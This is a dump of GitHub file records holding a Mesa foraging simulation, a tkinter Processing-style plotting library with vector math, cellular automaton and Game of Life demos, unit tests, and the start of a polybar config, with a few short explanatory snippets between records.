"license_type": "no_license",
"max_line_length": 74,
"num_lines": 116,
"path": "/foraging/agents.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "import random\n\nfrom mesa.agent import Agent\n\nfrom foraging.utils import euclidean\nfrom foraging.resources import Food\n\nclass Bug(Agent):\n \n treshold = 15\n metabolism = 1\n energy = 10\n strategy = None\n age = 0\n \n def __init__(self, unique_id, model, pos=None):\n super().__init__(unique_id, model)\n self.pos = pos\n self.move = {\"stick\": self.stick,\n \"switch\": self.switch,\n }\n \n def step(self):\n self.age += 1\n \n adult = self.age > 5\n old = self.age > 50\n \n if old:\n self.energy -= self.metabolism\n \n self.find_food()\n self.move[self.strategy]()\n \n # new Bug\n has_energy = self.energy >= self.treshold\n if has_energy and (adult):\n neig = self.model.grid.get_neighborhood(self.pos, True, False)\n \n if any(map(self.model.grid.is_cell_empty, neig)):\n empty = list(filter(self.model.grid.is_cell_empty, neig))\n pos = random.choice(empty)\n last = self.model.number_of_bug\n new_bug = Bug(last + 1, self.model)\n new_bug.strategy = self.strategy\n self.energy -= new_bug.energy\n self.model.grid.place_agent(new_bug, pos)\n self.model.schedule.add(new_bug)\n self.model.number_of_bug += 1\n else:\n pos = self.model.grid.find_empty()\n self.move_to(pos)\n \n # Death\n if self.energy <= 0:\n self.die()\n \n def switch(self): \n neig = self.model.grid.get_neighborhood(self.pos, True, False)\n pos = random.choice(neig)\n if self.model.grid.is_cell_empty(pos):\n self.move_to(pos)\n \n def stick(self):\n neig = self.model.grid.get_neighbors(self.pos, True)\n if not(neig):\n pos = self.model.grid.find_empty()\n self.move_to(pos)\n \n def move_to(self, pos):\n distance = round(euclidean(self.pos, pos))\n cost = self.metabolism * distance\n \n self.model.grid.move_agent(self, pos)\n self.energy -= cost\n \n def find_food(self):\n neig = self.model.grid.get_neighbors(self.pos, True, False)\n if neig:\n agent = random.choice(neig)\n if isinstance(agent, Food):\n self.eat(agent)\n \n def eat(self, food):\n gain = self.age * self.metabolism\n self.energy += gain\n food.energy -= gain\n \n def die(self):\n self.model.grid._remove_agent(self.pos, self)\n self.model.schedule.remove(self)\n self.model.number_of_bug -= 1\n\nclass Bean(Food):\n \n density = 0.005\n growth_rate = 4\n wilt_rate = 2\n max_growth = 20\n energy = 4\n\nclass Corn(Food):\n \n density = 0.01\n growth_rate = 2\n wilt_rate = 1\n max_growth = 10\n energy = 2\n\nclass Soy(Food):\n \n density = 0.001\n growth_rate = 20\n wilt_rate = 10\n max_growth = 100\n energy = 20"
},
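The two movement strategies can be compared head to head; a sketch running a seeded model for each (the step budget is arbitrary and the final counts depend on the seed):

from foraging.model import Foraging

for strategy in ("stick", "switch"):
    model = Foraging(num_bug=50, seed=42, strategy=strategy)
    for _ in range(200):
        if not model.running:
            break
        model.step()
    print(strategy, "->", model.number_of_bug, "bugs left")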
{
"alpha_fraction": 0.7882353067398071,
"alphanum_fraction": 0.7882353067398071,
"avg_line_length": 27.33333396911621,
"blob_id": "0ccb2b6ccab0c241a402cb4d83d67f978c51c15f",
"content_id": "c94e33ec96625eed538a787d4ea151b0b2d04c8d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 85,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 3,
"path": "/README.md",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "### Adventures in Dataland\n\nThis repository contains code and notebooks for my blog.\n"
},
{
"alpha_fraction": 0.6285714507102966,
"alphanum_fraction": 0.6448979377746582,
"avg_line_length": 31.700000762939453,
"blob_id": "c7317395021808410dfc819d89bd6f3a0c98d96b",
"content_id": "031fd87b7a3af2d1d35c36729cd22910606e2d69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 980,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 30,
"path": "/utils.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "def display_confusion_matrix(true, pred, labels=None, tablefmt=\"rst\"):\n import tabulate\n from sklearn.metrics import confusion_matrix\n \n cm = confusion_matrix(true, pred, labels=labels)\n data = [[k]+list(v) for k,v in enumerate(cm)]\n data.insert(0, list(labels))\n return tabulate.tabulate(data, headers=\"firstrow\", tablefmt=tablefmt)\n\ndef plot_misclass(x,true,pred,a=0,b=5):\n import matplotlib.pyplot as plt\n \n misclass = x[(true==a)&(pred==b)][:10]\n\n fig,axes = plt.subplots(nrows=2, ncols=5, figsize=(8,5))\n\n fig.suptitle(\"Some {} that were misclassified as {}\".format(a,b), fontsize=15)\n for ax,d in zip(fig.axes,misclass):\n d = d.reshape((28,28))\n ax.imshow(d, cmap=plt.cm.Greys)\n\ndef count(arr):\n from numpy import array\n from collections import defaultdict\n \n tab = defaultdict(int)\n for elt in arr:\n tab[elt] += 1\n keys,vals = zip(*tab.items()) \n return array(keys, dtype=int), array(vals)"
}
] | 7 |
rpalo/pyprocessing
|
https://github.com/rpalo/pyprocessing
|
b7c6de68e8d38c737e7f5d9538f6c8eeba3ce9fd
|
248d72a05f41d7e75fd2cd3bf84caa3ba63e216b
|
c282e7f3f8357b76e13dd4ba7b7029c87477f57c
|
refs/heads/master
| 2021-01-10T04:29:43.816345 | 2016-04-08T06:20:41 | 2016-04-08T06:20:41 | 55,466,880 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6270173192024231,
"alphanum_fraction": 0.6473401188850403,
"avg_line_length": 21.594594955444336,
"blob_id": "a25db884bc0938bc221c57eeabf671f5bb0dd721",
"content_id": "18d41c80b56e3d71fc4313a256dd42c7c055264b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1673,
"license_type": "permissive",
"max_line_length": 60,
"num_lines": 74,
"path": "/CA1.py",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "from pyprocessing import Plotter\nimport sys\n\n\"\"\"This module is just an example use case for pyprocessing.\nIt generates a 1-dimensional Cellular Automaton animation.\nCheck out rule 90, and several in the 100-120 range.\"\"\"\n\n\nclass CA:\n\n\tdef __init__(self, plot, resolution=10, rule=90):\n\t\tself.cells = []\n\t\tself.ruleset = self.get_ruleset(rule)\n\t\tprint(self.ruleset)\n\t\tself.resolution = resolution\n\t\tself.plot = plot\n\t\tfor i in range(int(self.plot.width/self.resolution)):\n\t\t\tself.cells.append(0)\n\t\tself.cells[int(len(self.cells)/2)] = 1\n\t\tself.generation = 0\n\n\tdef generate(self):\n\t\tnextgen = []\n\t\tnextgen.append(0)\n\t\tfor i in range(1, len(self.cells)-1):\n\t\t\tleft = self.cells[i-1]\n\t\t\tme = self.cells[i]\n\t\t\tright = self.cells[i+1]\n\t\t\tnextgen.append(self.rules(left, me, right))\n\t\tnextgen.append(0)\n\t\tself.cells = nextgen\n\t\tself.generation += 1\n\n\tdef rules(self, a, b, c):\n\t\ts = \"%d%d%d\" % (a, b, c)\n\t\tindex = int(s, 2)\n\t\treturn self.ruleset[index]\n\n\tdef display_row(self):\n\t\tfor i in range(len(self.cells)):\n\t\t\tif self.cells[i] == 1:\n\t\t\t\tself.plot.fill('black')\n\t\t\telse:\n\t\t\t\tself.plot.fill('white')\n\t\t\tself.plot.rect(i*self.resolution,\n\t\t\t\t\t\t\tself.generation*self.resolution,\n\t\t\t\t\t\t\tself.resolution,\n\t\t\t\t\t\t\tself.resolution)\n\n\tdef get_ruleset(self, rule):\n\t\truleset = [int(x) for x in bin(rule)[2:]]\n\t\twhile len(ruleset) < 8:\n\t\t\truleset.insert(0, 0)\n\t\treturn ruleset[::-1]\n\nclass CAPlot(Plotter):\n\n\tdef setup(self):\n\t\tself.CA.display_row()\n\n\tdef draw(self):\n\t\tself.CA.generate()\n\t\tself.CA.display_row()\n\n\n\nif __name__ == '__main__':\n\tp = CAPlot()\n\tif len(sys.argv) > 1:\n\t\tca = CA(resolution=5,plot=p, rule=int(sys.argv[1]))\n\telse:\n\t\tca = CA(plot=p)\n\tp.CA = ca\n\tp.mainloop()\n\n"
},
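get_ruleset above maps a Wolfram rule number to its eight neighborhood outputs, indexed by int("LMR", 2); a standalone check for rule 90, whose output is left XOR right:

def get_ruleset(rule):
    bits = [int(x) for x in bin(rule)[2:]]
    while len(bits) < 8:
        bits.insert(0, 0)
    return bits[::-1]

ruleset = get_ruleset(90)
print(ruleset)  # [0, 1, 0, 1, 1, 0, 1, 0]
assert ruleset[int("101", 2)] == 0  # 1 XOR 1
assert ruleset[int("100", 2)] == 1  # 1 XOR 0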
{
"alpha_fraction": 0.6087671518325806,
"alphanum_fraction": 0.6268492937088013,
"avg_line_length": 22.088607788085938,
"blob_id": "0672597031742376c72e678fff0846fad6991870",
"content_id": "edaa9d2206eed7645358c890aa2c148bf8b188c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1825,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 79,
"path": "/gol.py",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "from pyprocessing import Plotter\nimport random\n\nclass Cell:\n\n\tdef __init__(self, x, y, w, plot,board):\n\t\tself.x = x\n\t\tself.y = y\n\t\tself.w = w\n\t\tself.plot = plot \n\t\tself.board = board\n\t\tself.state = 0\n\t\tself.previous = 0\n\n\tdef display(self):\n\t\tif self.previous == 0 and self.state == 1:\n\t\t\tself.plot.fill('blue')\n\t\telif self.state == 1:\n\t\t\tself.plot.fill('black')\n\t\telif self.previous == 1 and self.state == 0:\n\t\t\tself.plot.fill('red')\n\t\telse:\n\t\t\tself.plot.fill('white')\n\t\tself.plot.rect(self.x*self.w, self.y*self.w, self.w, self.w)\n\n\tdef update(self):\n\t\tneighbors = 0\n\t\tfor i in range(-1, 2):\n\t\t\tfor j in range(-1, 2):\n\t\t\t\tneighbors += self.board[self.x+i][self.y+j].previous\n\t\tneighbors -= self.board[self.x][self.y].previous\n\t\tif self.previous == 1 and neighbors < 2:\n\t\t\tself.state = 0\n\t\telif self.previous == 1 and neighbors > 3:\n\t\t\tself.state = 0\n\t\telif self.previous == 0 and neighbors == 3:\n\t\t\tself.state = 1\n\nclass Game:\n\n\tdef __init__(self, plot, w=10):\n\t\tself.w = w\n\t\tself.plot = plot\n\t\tself.rows = int(self.plot.width/self.w)\n\t\tself.cols = int(self.plot.height/self.w)\n\t\tself.board = []\n\t\tfor j in range(self.rows):\n\t\t\tself.board.append([])\n\t\t\tfor i in range(self.cols):\n\t\t\t\tnewCell = Cell(i, j, w, self.plot, self.board)\n\t\t\t\tnewCell.previous = random.randint(0,1)\n\t\t\t\tself.board[j].append(newCell)\n\n\tdef display(self):\n\t\tfor j in range(1,self.rows-1):\n\t\t\tfor i in range(1,self.cols-1):\n\t\t\t\tself.board[j][i].display()\n\t\t\t\tself.board[j][i].previous = self.board[j][i].state\n\n\tdef update(self):\n\t\tfor j in range(1,self.rows-1):\n\t\t\tfor i in range(1, self.cols-1):\n\t\t\t\tself.board[j][i].update()\n\nclass gamePlotter(Plotter):\n\n\tdef setup(self):\n\t\tpass\n\n\tdef draw(self):\n\t\tself.clear()\n\t\tself.game.update()\n\t\tself.game.display()\n\nif __name__ == '__main__':\n\tp = gamePlotter()\n\tg = Game(plot=p)\n\tp.game = g\n\tp.mainloop()\n\n"
},
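The conditional chain in Cell.update is Conway's standard B3/S23 rule; a compact equivalent for reference:

def next_state(previous, neighbors):
    """Born with exactly 3 neighbors, survives with 2 or 3."""
    return 1 if neighbors == 3 or (previous == 1 and neighbors == 2) else 0

assert next_state(1, 1) == 0  # underpopulation
assert next_state(1, 4) == 0  # overpopulation
assert next_state(0, 3) == 1  # reproduction
assert next_state(1, 2) == 1  # survival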
{
"alpha_fraction": 0.6584981083869934,
"alphanum_fraction": 0.6638005375862122,
"avg_line_length": 27.950206756591797,
"blob_id": "a824265c2d6c796edc332bc7d3ff0575fa4aa379",
"content_id": "c016c56ef147bfa6ad61eece0cc6f5c84e56daa3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6978,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 241,
"path": "/pyprocessing.py",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\nfrom math import sin, asin, cos, acos, tan, atan2, radians, degrees, pi, sqrt\n\nclass Plotter:\n\t\"\"\"Main controller class. Basically simulates a processing\n\twindow and provides the interfaces to the tkinter inner workings.\n\tNot sure if this is the best way to go on this yet.\"\"\"\n\n\tdef __init__(self, width=600, height=600, timestep=100):\n\t\tself.root = tk.Tk()\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.timestep = timestep\n\t\tself.canvas = tk.Canvas(self.root,\n\t\t\t\t\t\t\t\twidth=self.width,\n\t\t\t\t\t\t\t\theight=self.height)\n\t\tself.canvas.pack()\n\t\tself.frame = 0\n\t\tself.matrix = {\n\t\t\t\"linecolor\": \"black\",\n\t\t\t\"fill\": \"\",\n\t\t\t\"origin_x\": 0,\n\t\t\t\"origin_y\": 0,\n\t\t\t\"rotation\": 0,\n\t\t\t\"linewidth\": 2,\n\t\t}\n\t\tself.matrixStack = []\n\n\tdef setup(self):\n\t\t\"\"\"Sets up the window before the first frame goes.\n\t\tTo be implemented in all subclasses\"\"\"\n\t\t\n\t\traise NotImplementedError(\"Setup method was not set\")\n\n\tdef draw(self):\n\t\t\"\"\"This function to be run once per frame, drives the animation.\n\t\tTo be implemented in all subclasses. If it isn't, animation will\n\t\tstop\"\"\"\n\n\t\traise NotImplementedError(\"Draw method was not set\")\n\n\tdef _animate(self):\n\t\t\"\"\"Main animation mechanics for draw loop\"\"\"\n\t\ttry:\n\t\t\tself.draw()\n\t\texcept NotImplementedError:\n\t\t\treturn False\n\t\tself.root.after(self.timestep, self._animate)\n\t\tself.frame += 1\n\n\tdef _toGlobal(self, x_local, y_local):\n\t\t\"\"\"Converts local x, y to global x, y.\n\t\tReturns tuple of pixel coords.\"\"\"\n\t\ttheta = radians(self.matrix[\"rotation\"])\n\t\tx_global = self.matrix[\"origin_x\"] + x_local*cos(theta) + y_local*sin(theta)\n\t\ty_global = self.matrix[\"origin_y\"] + y_local*cos(theta) - x_local*sin(theta)\n\t\treturn x_global, y_global\n\n\n\tdef rect(self, x, y, width, height):\n\t\t\"\"\"Draws a rectangle with top-left corner at x, y. Returns id\n\t\tof object\"\"\"\n\n\t\tlocal_points = [(x, y), (x+width, y), (x+width, y+height), (x, y+height)]\n\t\tglobal_points = []\n\t\tfor _x, _y in local_points:\n\t\t\tglobal_points.append(self._toGlobal(_x, _y))\n\n\t\treturn self.canvas.create_polygon(\n\t\t\t\t\t\t\t\toutline=self.matrix[\"linecolor\"],\n\t\t\t\t\t\t\t\tfill=self.matrix[\"fill\"],\n\t\t\t\t\t\t\t\twidth=self.matrix[\"linewidth\"],\n\t\t\t\t\t\t\t\t*global_points)\n\n\tdef oval(self, x, y, width, height, resolution=20):\n\t\t\"\"\"Draws an oval with top-left corner at x, y. Returns id of object\"\"\"\n\t\tglobal_points = []\n\t\ttheta = 0\n\t\ttheta_step = 2*pi/resolution\n\t\ta = width/2\n\t\tb = height/2\n\t\txc = x + a\n\t\tyc = y + b\n\t\tfor i in range(resolution):\n\t\t\ttheta = theta + theta_step\n\t\t\tx1 = a*cos(theta) + xc \n\t\t\ty1 = b*sin(theta) + yc \n\t\t\tglobal_points.append(self._toGlobal(x1, y1))\n\n\t\treturn self.canvas.create_polygon(\n\t\t\t\t\t\t\t\toutline=self.matrix[\"linecolor\"],\n\t\t\t\t\t\t\t\tfill=self.matrix[\"fill\"],\n\t\t\t\t\t\t\t\twidth=self.matrix[\"linewidth\"],\n\t\t\t\t\t\t\t\t*global_points)\n\n\tdef circle(self, x, y, r, resolution=20):\n\t\t\"\"\"Draws a circle (width = height) with center at x, y. 
Returns\n\t\tid of object\"\"\"\n\t\treturn self.oval(x-r, y-r, 2*r, 2*r, resolution)\n\n\tdef clear(self):\n\t\t\"\"\"Clears the whole canvas out\"\"\"\n\t\tself.canvas.delete(\"all\")\n\n\tdef background(self, color):\n\t\t\"\"\"Sets the background color of the canvas\"\"\"\n\t\tself.canvas.configure(background=color)\n\n\tdef fill(self, color):\n\t\t\"\"\"Sets the active fill to the current color\"\"\"\n\t\tself.matrix[\"fill\"] = color\n\n\tdef pushMatrix(self):\n\t\t\"\"\"Saves the current major settings for unpacking later\"\"\"\n\t\tself.matrixStack.append(self.matrix.copy())\n\n\tdef popMatrix(self):\n\t\t\"\"\"Pops a matrix off of the stack, restoring those settings\"\"\"\n\t\tself.matrix = self.matrixStack.pop()\n\n\tdef translate(self, x, y):\n\t\t\"\"\"Translates the origin to a proscribed x, y point\"\"\"\n\t\tself.matrix[\"origin_x\"] += x \n\t\tself.matrix[\"origin_y\"] += y\n\n\tdef rotate(self, theta):\n\t\t\"\"\"Rotates the origin reference frame by theta degrees.\n\t\tTheta zero is positive x axis, positive theta is ccw\"\"\"\n\t\tself.matrix[\"rotation\"] = theta\n\n\tdef stroke(self, **kwargs):\n\t\t\"\"\"Takes in some stroke variables and sets them. Possible inputs:\n\t\twidth = sets the line width\n\t\tcolor = sets the pen color\"\"\"\n\t\tif \"width\" in kwargs:\n\t\t\tself.matrix[\"linewidth\"] = kwargs[\"width\"]\n\t\tif \"color\" in kwargs:\n\t\t\tself.matrix[\"linecolor\"] = kwargs[\"color\"]\n\n\tdef mainloop(self):\n\t\t\"\"\"Runs the mainloop of the animation\"\"\"\n\n\t\tself.setup()\n\t\tself.root.after(0, self._animate)\n\t\tself.root.mainloop()\n\nclass PVector:\n\t\"\"\"Python implementation of Processing's PVector class, which is\n\t(until I learn differently), basically a vector. One might call\n\tthis one a... PYVector. Heh. Essentially it has an x and y component\n\twhich can be converted back and forth to angle and magnitude. \n\tVarious supporting mathematical functions ensue. I know that\n\tthere is most definitely already a python implementation of a vector\n\tout there and that it is probably way better than this, but\n\tI'm making this one for fun.\"\"\"\n\n\tdef __init__(self, x, y):\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef __str__(self):\n\t\treturn \"<%f, %f>\" % (self.x, self.y)\n\n\tdef __repr__(self):\n\t\treturn \"<PVector: (%f, %f)>\" % (self.x, self.y)\n\n\tdef __add__(self, other):\n\t\tif isinstance(other, PVector):\n\t\t\treturn PVector(self.x + other.x, self.y + other.y)\n\t\telse:\n\t\t\treturn PVector(self.x + other,self.y + other)\n\n\tdef __sub__(self, other):\n\t\tif isinstance(other, PVector):\n\t\t\treturn PVector(self.x - other.x, self.y - other.y)\n\t\telse:\n\t\t\treturn PVector(self.x - other, self.y - other)\n\n\tdef __mul__(self, other):\n\t\tif isinstance(other, PVector):\n\t\t\treturn self.dot(other)\n\t\telse:\n\t\t\treturn PVector(self.x * other, self.y * other)\n\n\tdef __div__(self, other):\n\t\treturn PVector(self.x / other, self.y / other)\n\n\tdef __neg__(self, other):\n\t\treturn PVector(-self.x, -self.y)\n\n\tdef cross(self, other):\n\t\t\"\"\"Returns the cross product of self and other. \n\t\tObviously since these are all 2D, cross product will\n\t\tbe in Z dimension only. 
Return value is a floating\n\t\tpoint number, in the k dimension\"\"\"\n\n\t\treturn (self.x * other.y) - (self.y * other.x)\n\n\tdef dot(self, other):\n\t\t\"\"\"Returns the dot product of self and other\"\"\"\n\n\t\treturn self.x * other.x + self.y * other.y\n\n\tdef mag(self):\n\t\t\"\"\"Returns the vectors magnitude\"\"\"\n\t\treturn sqrt(self.x**2 + self.y**2)\n\n\tdef theta(self, degree=True):\n\t\t\"\"\"Returns the vector's angle\"\"\"\n\t\tif degree:\n\t\t\treturn degrees(atan2(self.y, self.x))\n\t\telse:\n\t\t\treturn atan2(self.y, self.x)\n\n\tdef setMag(self, magnitude):\n\t\t\"\"\"Sets this vectors magnitude at same angle\"\"\"\n\t\tmag = self.mag()\n\t\ttheta = self.theta(degree=False)\n\t\tself.x = magnitude*cos(theta)\n\t\tself.y = magnitude*sin(theta)\n\n\tdef scale(self, factor):\n\t\t\"\"\"Scales this vector's magnitude by a certain factor\n\t\twhile keeping the angle the same.\"\"\"\n\n\t\tself.setMag(factor*self.mag())\n\n\tdef norm(self):\n\t\t\"\"\"Scales self to unit vector\"\"\"\n\t\tself.setMag(1)\n\n\tdef rotate(self, angle):\n\t\t\"\"\"Rotates vector by angle degrees. Positive theta ccw\"\"\"\n\t\ttheta = self.theta(degree=False)\n\t\ttheta += radians(angle)\n\t\tmag = self.mag()\n\t\tself.x = mag*cos(theta)\n\t\tself.y = mag*sin(theta)\n\n\tdef get_angle_between(self, other):\n\t\treturn degrees(acos(self.dot(other)/(self.mag()*other.mag())))\n\n"
},
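_toGlobal above applies a 2-D rotation about the translated origin; a standalone check of the same arithmetic (screen y grows downward, so local +x maps to global -y under a 90-degree rotation):

from math import sin, cos, radians

def to_global(x, y, ox, oy, rot_degrees):
    """Mirror of Plotter._toGlobal."""
    t = radians(rot_degrees)
    return ox + x * cos(t) + y * sin(t), oy + y * cos(t) - x * sin(t)

gx, gy = to_global(1, 0, 0, 0, 90)
print(round(gx, 6), round(gy, 6))  # 0.0 -1.0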
{
"alpha_fraction": 0.5756630301475525,
"alphanum_fraction": 0.6365054845809937,
"avg_line_length": 18.439393997192383,
"blob_id": "1d987550a4b96f7e82e8d34646fb048efa5645d7",
"content_id": "1eb5298a1402b39568a70902f801816a019eb4ff",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1282,
"license_type": "permissive",
"max_line_length": 68,
"num_lines": 66,
"path": "/test_plotter.py",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "import pyprocessing as proc \n\nclass TestPlotDude(proc.Plotter):\n\n\tdef setup(self):\n\t\t\"\"\"Adds a test setup method\"\"\"\n\n\t\td.display()\n\n\tdef draw(self):\n\t\t\"\"\"Adds a test draw method\"\"\"\n\n\t\tself.clear()\n\t\td.update()\n\t\td.display()\n\nclass TestPlotSimple(proc.Plotter):\n\n\tdef setup(self):\n\t\tself.stroke(color='red')\n\t\tself.rect(100, 100, 100, 50)\n\t\tself.pushMatrix()\n\t\tself.translate(200, 200)\n\t\tself.rotate(15)\n\t\tself.stroke(color='black')\n\t\tself.rect(0,0,100, 50)\n\t\tself.oval(100, 100, 50, 40, 50)\n\t\tself.circle(50, 50, 200)\n\t\tself.popMatrix()\n\t\tself.rect(0, 0, 100, 50)\n\n\n\nclass Dude:\n\t\"\"\"Little autonomous dude for testing\"\"\"\n\n\tdef __init__(self, plot):\n\t\tself.x = plot.width/2\n\t\tself.y = 0\n\t\tself.vx = 0\n\t\tself.vy = 1\n\t\tself.ay = 1\n\t\tself.plot = plot\n\t\n\tdef update(self):\n\t\t\"\"\"Updates all of the little dude's properties at each timestep\"\"\"\n\t\tself.x += self.vx\n\t\tself.vy += self.ay\n\t\tself.y += self.vy\n\n\tdef display(self):\n\t\t\"\"\"Displays the little dude\"\"\"\n\t\tself.plot.pushMatrix()\n\t\tself.plot.translate(self.x, self.y)\n\t\tself.plot.fill('yellow')\n\t\tself.plot.circle(0, 0, 30)\n\t\tself.plot.fill('black')\n\t\tself.plot.circle(-10, -10, 5)\n\t\tself.plot.circle(10, -10, 5)\n\t\tself.plot.rect(-10, 0, 20, 10)\n\t\tself.plot.popMatrix()\n\nif __name__ == '__main__':\n\tt = TestPlotSimple()\n\t\n\tt.mainloop()"
},
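Note that TestPlotDude's setup/draw reference a module-level d that the __main__ block above never creates (it runs TestPlotSimple instead); a sketch of wiring the Dude demo up:

if __name__ == '__main__':
    t = TestPlotDude()
    d = Dude(plot=t)  # the global `d` that setup()/draw() use
    t.mainloop()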
{
"alpha_fraction": 0.7057877779006958,
"alphanum_fraction": 0.7122186422348022,
"avg_line_length": 46.769229888916016,
"blob_id": "8876129a3e1b74e48219b878912ce96801e9b1c0",
"content_id": "653fdabea491caae1ea9804e26a96941231ff7de",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 622,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 13,
"path": "/ideas.md",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "# Ideas for the project\n\n- [x] Basic Functionality: Setup, Draw, Rect, Oval, Circle\n- [x] Make some tests that run as if it's being used.\n- [ ] Figure out best way to interface with it\n- [x] Play with it using the Nature of Code book\n- [ ] Incorporate decorators?\n- [ ] Manage upside down x, y axes?\n- [ ] Implement center modes for rect and oval?\n- [x] Figure out whether or not I want to permit kwargs for pass throughs\n- [x] Implement Rotate, more advanced function for x0, y0, x1, y1 calcs (sine/cos, etc)\n- [x] Implement PVectors\n- [x] Write actual test cases for PVectors, which are a little easier to test casify.\n\n"
},
{
"alpha_fraction": 0.6005138158798218,
"alphanum_fraction": 0.6480411291122437,
"avg_line_length": 24.09677505493164,
"blob_id": "c5f68326878d541faee3e2f031ff6ff0dd566909",
"content_id": "e0b8405142b40b0de26dd280ed812b7792f11d41",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1557,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 62,
"path": "/test_pvector.py",
"repo_name": "rpalo/pyprocessing",
"src_encoding": "UTF-8",
"text": "from pyprocessing import PVector\nimport unittest\n\nclass TestPVectorMethods(unittest.TestCase):\n\n\tdef setUp(self):\n\t\tself.A = PVector(1, 0)\n\t\tself.B = PVector(0, 5)\n\t\tself.C = PVector(3,4)\n\t\tself.D = PVector(4, 4)\n\n\tdef test_cross(self):\n\t\t# <1, 0> x <0, 5> = 5 - 0 = 5\n\t\tself.assertEqual(self.A.cross(self.B), 5)\n\t\t# switching order should be inverse\n\t\tself.assertEqual(self.B.cross(self.A), -5)\n\n\tdef test_dot(self):\n\t\t# <3, 4> * <4, 4> = 3*4 + 4*4 = 12 + 16 = 28\n\t\tself.assertEqual(self.C.dot(self.D), 28)\n\n\tdef test_mag(self):\n\t\t# sqrt(3**2 + 4**2) = 5\n\t\tself.assertEqual(self.C.mag(), 5)\n\n\tdef test_theta(self):\n\t\tself.assertEqual(self.A.theta(), 0)\n\t\tself.assertEqual(self.B.theta(), 90)\n\t\tself.assertEqual(self.D.theta(), 45)\n\n\tdef test_theta_radians(self):\n\t\t# 45 degrees is pi/4\n\t\tself.assertAlmostEqual(self.D.theta(degree=False),\n\t\t\t\t\t\t\t\t3.14159/4.0, places=2)\n\n\tdef test_setMag(self):\n\t\tself.A.setMag(self.B.mag())\n\t\tself.assertEqual(self.A.mag(), self.B.mag())\n\n\tdef test_scale(self):\n\t\tself.B.scale(2)\n\t\t# 2 * 5 is 10\n\t\tself.assertEqual(self.B.mag(), 10)\n\t\tself.B.scale(-2)\n\t\t# opposite length is still length\n\t\tself.assertEqual(self.B.mag(), 20)\n\n\tdef test_norm(self):\n\t\tself.C.norm()\n\t\tself.assertEqual(self.C.mag(), 1)\n\n\tdef test_rotate(self):\n\t\tself.A.rotate(90)\n\t\tself.assertEqual(self.A.theta(), self.B.theta())\n\n\tdef test_angle_between(self):\n\t\tself.A.x, self.A.y = 0, 1\n\t\tself.assertEqual(self.A.get_angle_between(self.B), 0)\n\t\tself.assertAlmostEqual(self.D.get_angle_between(self.A), 45)\n\nif __name__ == '__main__':\n\tunittest.main()\n\n"
}
] | 6 |
angelip2303/config
|
https://github.com/angelip2303/config
|
5e00900d8df6ac1fdb04e85769632bc74db4a6ec
|
1e6753287b59a3b99177a13d0af6ec109f8deacf
|
d5344124b9d52f1392d7f88a728e5ff55fe47c34
|
refs/heads/master
| 2022-11-06T22:31:46.792929 | 2020-07-28T21:39:49 | 2020-07-28T21:39:49 | 265,946,966 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.55633544921875,
"alphanum_fraction": 0.58111572265625,
"avg_line_length": 21.112010955810547,
"blob_id": "fcc030193ebdf5de125b1594de484f09c8cb5fcb",
"content_id": "4278dc308d17199aa41ae68725f1ed15c7b618b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 16548,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 741,
"path": "/my-polybar/modules.ini",
"repo_name": "angelip2303/config",
"src_encoding": "UTF-8",
"text": "# _ U _____ u\n# U /'\\ u \\| ___'|/\n# \\/ _ \\/ | _|'\n# / ___ \\ | |___\n# /_/ \\_\\ |_____|\n# \\\\ >> << >>\n# (__) (__)(__) (__)\n\n\n# ___ ___ _ _ \n# | \\/ | | | | | \n# | . . | ___ __| |_ _| | ___ ___ \n# | |\\/| |/ _ \\ / _` | | | | |/ _ \\/ __|\n# | | | | (_) | (_| | |_| | | __/\\__ \\\n# \\_| |_/\\___/ \\__,_|\\__,_|_|\\___||___/\n\n\n###############################\n# #\n# -*- ALSA MODULE -*- #\n# #\n###############################\n\n[module/alsa]\ntype = internal/alsa\n\nmaster-soundcard = hw:1\nspeaker-soundcard = hw:1\nheadphone-soundcard = hw:1\n\nmaster-mixer = Master\n\n# Volume bar Config.\nbar-volume-width = 10\nbar-volume-empty = \nbar-volume-fill = \nbar-volume-indicator = \nbar-volume-gradient = true\n\nformat-volume-padding = 2\nformat-volume-background = #fff85a\nformat-volume-foreground = #43433a\nformat-volume-underline = #fffb8f\nformat-volume-overline = #fffb8f\n\n# Available tags:\n# 1. <label-volume> (default).\n# 2. <ramp-volume>.\n# 3. <bar-volume>.\nformat-volume = <ramp-volume> <label-volume>\nlabel-volume = %percentage%%\n\n# Available tags:\n# 1. <label-volume> (default).\n# 2. <ramp-volume>.\n# 3. <bar-volume>.\nformat-muted = 